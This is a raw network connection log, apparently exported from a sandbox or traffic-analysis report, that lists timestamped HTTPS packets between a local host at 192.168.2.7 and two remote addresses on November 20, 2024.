                                                                                                                                                                                                Nov 20, 2024 10:54:28.826476097 CET4434977513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.826842070 CET49775443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.826864958 CET4434977513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.827189922 CET49775443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.827198029 CET4434977513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.846468925 CET4434977613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.846936941 CET49776443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.846945047 CET4434977613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.847348928 CET49776443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.847354889 CET4434977613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.884779930 CET4434977813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.885552883 CET49778443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.885567904 CET4434977813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.886063099 CET49778443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.886070967 CET4434977813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.913801908 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.913916111 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.915198088 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.915203094 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.915549994 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.916930914 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.917728901 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.917757988 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.917866945 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.917895079 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.917998075 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.918051004 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.918188095 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.918210030 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.918360949 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.918389082 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.918545961 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.918584108 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.926853895 CET4434977713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.926999092 CET4434977713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.927050114 CET49777443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.927218914 CET49777443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.927238941 CET4434977713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.927253008 CET49777443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.927259922 CET4434977713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.927913904 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.928066969 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.928109884 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.928121090 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.928270102 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.928293943 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.928323030 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.928334951 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.928452969 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.928492069 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.929943085 CET49781443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.930000067 CET4434978113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.930084944 CET49781443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.930227041 CET49781443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.930254936 CET4434978113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.936713934 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.936758041 CET4434977513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.936805964 CET4434977513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.936820030 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.936839104 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.936855078 CET49775443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.937019110 CET49775443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.937019110 CET49775443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.937043905 CET4434977513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.937057018 CET4434977513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.954283953 CET4434977613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.954449892 CET4434977613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.954509020 CET49776443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.958256960 CET49776443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.958272934 CET4434977613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.958288908 CET49776443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.958296061 CET4434977613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.961409092 CET49782443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.961445093 CET4434978213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.961539984 CET49782443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.961646080 CET49782443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.961663008 CET4434978213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.962227106 CET49783443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.962258101 CET4434978313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.962316036 CET49783443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.962433100 CET49783443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.962446928 CET4434978313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.973068953 CET4434977913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.974113941 CET49779443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.974124908 CET4434977913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.974812984 CET49779443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.974817991 CET4434977913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.988053083 CET4434977813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.988111019 CET4434977813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.988166094 CET49778443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.988744974 CET49778443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.988763094 CET4434977813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.988780022 CET49778443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.988794088 CET4434977813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.993376970 CET49784443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.993413925 CET4434978413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.993473053 CET49784443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.993617058 CET49784443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.993633032 CET4434978413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.073512077 CET4434977913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.073585987 CET4434977913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.073633909 CET49779443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.073831081 CET49779443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.073837042 CET4434977913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.073851109 CET49779443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.073856115 CET4434977913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.076765060 CET49785443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.076792002 CET4434978513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.076862097 CET49785443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.077039957 CET49785443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.077053070 CET4434978513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.588560104 CET4434978113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.589134932 CET49781443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.589154005 CET4434978113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.589603901 CET49781443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.589608908 CET4434978113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.601433039 CET4434978213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.601988077 CET49782443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.601999998 CET4434978213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.602312088 CET49782443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.602315903 CET4434978213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.633095980 CET4434978413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.633590937 CET49784443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.633603096 CET4434978413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.634033918 CET49784443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.634040117 CET4434978413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.637803078 CET4434978313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.638175964 CET49783443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.638190985 CET4434978313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.638609886 CET49783443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.638616085 CET4434978313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.692873955 CET4434978113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.693015099 CET4434978113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.693187952 CET49781443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.693255901 CET49781443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.693255901 CET49781443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.693289995 CET4434978113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.693314075 CET4434978113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.695863008 CET49786443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.695899963 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.695972919 CET49786443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.696126938 CET49786443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.696140051 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.703022957 CET4434978213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.703104973 CET4434978213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.703164101 CET49782443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.703332901 CET49782443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.703332901 CET49782443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.703350067 CET4434978213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.703358889 CET4434978213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.705713987 CET49787443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.705737114 CET4434978713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.705805063 CET49787443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.705921888 CET49787443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.705936909 CET4434978713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.730762005 CET4434978513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.731396914 CET49785443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.731404066 CET4434978513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.731779099 CET49785443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.731782913 CET4434978513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.739079952 CET4434978413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.739149094 CET4434978413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.739223957 CET49784443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.739377022 CET49784443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.739387989 CET4434978413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.739398956 CET49784443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.739403009 CET4434978413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.742027044 CET49788443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.742043018 CET4434978813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.742120981 CET49788443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.742269993 CET49788443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.742281914 CET4434978813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.747394085 CET4434978313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.747450113 CET4434978313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.747498989 CET49783443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.747615099 CET49783443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.747632980 CET4434978313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.747646093 CET49783443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.747652054 CET4434978313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.749736071 CET49789443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.749746084 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.749831915 CET49789443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.749979973 CET49789443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.749994040 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.836026907 CET4434978513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.836108923 CET4434978513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.836160898 CET49785443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.839767933 CET49785443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.839773893 CET4434978513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.839791059 CET49785443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.839795113 CET4434978513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.843122959 CET49790443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.843141079 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:29.843230009 CET49790443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.848166943 CET49790443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:29.848179102 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.475929976 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.476268053 CET4434978813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.476471901 CET49789443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.476484060 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.476691961 CET49788443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.476711035 CET4434978813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.477010012 CET49789443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.477014065 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.477176905 CET49788443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.477180958 CET4434978813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.478816986 CET4434978713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.479099035 CET49787443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.479106903 CET4434978713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.479446888 CET49787443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.479450941 CET4434978713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.480715036 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.481002092 CET49786443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.481010914 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.481388092 CET49786443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.481391907 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.583950996 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.583969116 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584009886 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584079027 CET49789443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584326982 CET49789443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584336042 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584369898 CET49789443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584372997 CET4434978913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584594011 CET4434978813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584646940 CET4434978813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584697962 CET49788443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584775925 CET49788443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584788084 CET4434978813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584796906 CET49788443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.584803104 CET4434978813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587378025 CET49791443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587393999 CET4434979113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587459087 CET49792443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587507010 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587542057 CET49791443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587557077 CET49792443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587666035 CET49791443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587677002 CET4434979113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587693930 CET49792443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.587716103 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.591595888 CET4434978713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.591867924 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.591917038 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.591975927 CET49786443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.591986895 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592000961 CET4434978713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592057943 CET49787443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592076063 CET49787443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592080116 CET4434978713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592107058 CET49787443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592109919 CET49786443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592111111 CET4434978713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592120886 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592133999 CET49786443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.592178106 CET4434978613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.594324112 CET49793443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.594336987 CET4434979313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.594408035 CET49793443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.594434023 CET49794443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.594446898 CET4434979413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.594522953 CET49794443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.594907045 CET49793443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.594918013 CET4434979313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.595033884 CET49794443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.595048904 CET4434979413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.661688089 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.662199974 CET49790443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.662208080 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.662707090 CET49790443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.662712097 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762489080 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762517929 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762656927 CET49790443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762666941 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762712955 CET49790443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762873888 CET49790443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762877941 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762888908 CET49790443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762900114 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.762957096 CET4434979013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.765356064 CET49795443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.765371084 CET4434979513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:30.765446901 CET49795443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.765592098 CET49795443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:30.765603065 CET4434979513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.222954035 CET4434979113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.223413944 CET49791443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.223429918 CET4434979113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.223879099 CET49791443192.168.2.713.107.246.45
